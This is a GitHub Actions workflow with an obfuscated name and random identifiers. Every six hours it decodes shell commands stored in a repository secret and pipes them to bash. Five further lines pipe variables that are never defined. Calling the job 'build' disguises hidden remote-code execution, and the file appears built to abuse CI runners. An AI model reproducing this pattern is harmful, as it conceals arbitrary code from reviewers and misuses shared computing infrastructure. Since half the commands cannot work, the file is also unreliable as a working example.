name: pousuanshami

on:
  workflow_dispatch:
  schedule:
    - cron: '22 5/6 * * *'

jobs:  # 18410
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: pousuanshami
        env:
          tn30: ${{ secrets.tn30 }}
        run: |
          echo $tn30 | jq -r .og21106 | /bin/bash
          echo $tpqrc88 | jq -r .viv81 | /bin/bash
          echo $jxdqe48 | jq -r .bd6 | /bin/bash
          echo $y07 | jq -r .otfbu72840 | /bin/bash
          echo $brcy07681 | jq -r .gk146 | /bin/bash
          echo $cmvi6 | jq -r .hhbx49 | /bin/bash

